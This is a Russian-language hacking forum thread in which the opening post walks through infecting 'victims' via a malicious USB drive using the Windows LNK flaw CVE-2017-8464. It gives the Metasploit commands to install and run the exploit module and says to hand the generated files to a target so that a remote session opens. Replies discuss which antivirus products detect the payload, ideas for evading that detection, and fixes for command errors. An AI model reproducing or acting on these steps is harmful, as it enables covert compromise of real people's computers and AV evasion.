/bad USB CVE_2017_8464\ _ # by Ondrik8

[Ondrik8]

Всем привет, смотрю пошла у нас движуха с USB девайсами для заражения жертв, ну думаю "че я лысый?) в трэнде нужно быть!" Правильно?_) Вот и представлю Вашему вниманию очередной способ заражения от меня)
Нам потребуется 5 минут USB - накопитель, Kali-linux и так едем...

Ссылка скрыта от гостей

!

уязвимые ОС-и

переименовываем и телепортируем в метасплойт:

mv 42382 CVE_2017_8464_LNK_Rce.rb

mv CVE_2017_8464_LNK_Rce.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

запускаем MSF и обновляемся командой: reload_all и...

exploit -j

далее, настраиваем под себя уязвимость:

use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce

можете еще и порт настроить под себя, жмем: exploit

MSF сгенерит файлы, откроем скрытую папку где они лежат) командой: xdg-open /root/.msf4/local/

перенесем их в нашу злую USB-flash-ку )) и подсунем флэшку "жертве прогресса"!)) Как только "жертва" откроет у себя на компе для просмотра содержимого, у Вас появится заветная сессия!))

Удачи!

 

[MrsRobot]

спасибо! а как реагируют антивирусники, не тестил? есет будет ругаться?

 

[Ondrik8]

спасибо! а как реагируют антивирусники, не тестил? есет будет ругаться?

не нетестил с антиками) если есть возможность? отпиши плиз..

 

[MrsRobot]

не нетестил с антиками) если есть возможность? отпиши плиз..

где б достать такую редкость как флешка.. ?) неужели ими кто-то пользуется..?_)
а файл же остался у тебя? может на вирустотал закинешь, проверишь? была бы благодарна..)

 

[Ondrik8]

где б достать такую редкость как флешка.. ?) неужели ими кто-то пользуется..?_)
а файл же остался у тебя? может на вирустотал закинешь, проверишь? была бы благодарна..)

У Вас нету разве простой USB флэшки?)) там много файлов и НЕ НУЖНО на вирус-тотал закидывать что либо !!!!!!!!!!!!! про это уже знают все)

 

[IioS]

не нетестил с антиками) если есть возможность? отпиши плиз..

360 total security - палит троян как только флешку втыкнула

 

[MrsRobot]

360 total security - палит троян как только флешку втыкнула

есет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине
[doublepost=1505503857,1505503779][/doublepost]

У Вас нету разве простой USB флэшки?)) там много файлов и НЕ НУЖНО на вирус-тотал закидывать что либо !!!!!!!!!!!!! про это уже знают все)

ок..сама потестирую будет время
у нас все в облаках

 

[Ondrik8]

есет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине
[doublepost=1505503857,1505503779][/doublepost]
ок..сама потестирую будет время
у нас все в облаках

Ссылка скрыта от гостей

Ссылка скрыта от гостей

Ссылка скрыта от гостей

Ссылка скрыта от гостей

Ссылка скрыта от гостей

Ссылка скрыта от гостей

 

[persivald]

есет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине
[doublepost=1505503857,1505503779][/doublepost]
ок..сама потестирую будет время
у нас все в облаках

есет смарт секьюрити (лицензия) обнаруживает трояна

 

[MrsRobot]

есет смарт секьюрити (лицензия) обнаруживает трояна

благодарю!

 

[Дедок]

кто может выложите плез файлы которые на флешку подкладываются нет под рукой метасплойта чеб сгенерить, покумекаю мож че как детект сбить.

 

[gt76g]

При подключении флешки произойдет авторан эксплoитa?

 

[IioS]

кто может выложите плез файлы которые на флешку подкладываются нет под рукой метасплойта чеб сгенерить, покумекаю мож че как детект сбить.

Пагади... Там ж под каждый ип отдельны, могу помочь, дай только свой локальный ип(с той сети где будешь тестить)

 

[Дедок]

Пагади... Там ж под каждый ип отдельны, могу помочь, дай только свой локальный ип(с той сети где будешь тестить)

не мне нужно взглянуть на файлы что они из себя представляют для начала

 

[IioS]

не мне нужно взглянуть на файлы что они из себя представляют для начала

держи

 

[Дедок]

держи

мне нужны именно ФАЙЛЫ которые на этой картинке ) не скрин ) понять в каком моменте детект идет какой кусок кода или на каком методе палево идет если моя мысль правильная когда я просматривал код экспа то есть идея как сбить, нужно тестнуть в обшем

 

[Ondrik8]

Девушка.... что хотеть?)

Чето фильм вспомнился "девушка с тату дракона")

 

[IioS]

Девушка.... что хотеть?)
Чето фильм вспомнился "девушка с тату дракона")

Блин, ну тупанула, че ты так сразу)

 

[ghost]

Девушка.... что хотеть?)

Чето фильм вспомнился "девушка с тату дракона")

Хороший фильм

msf > -j
[-] Unknown command: -j.
msf >
msf > use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce
[-] Failed to load module: exploit/windows/fileformat/CVE_2017_8464_LNK_Rce
msf >

 

[IioS]

msf > use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce

не капсом напиши, ивсе сработает. (и не -j, а exploit -j)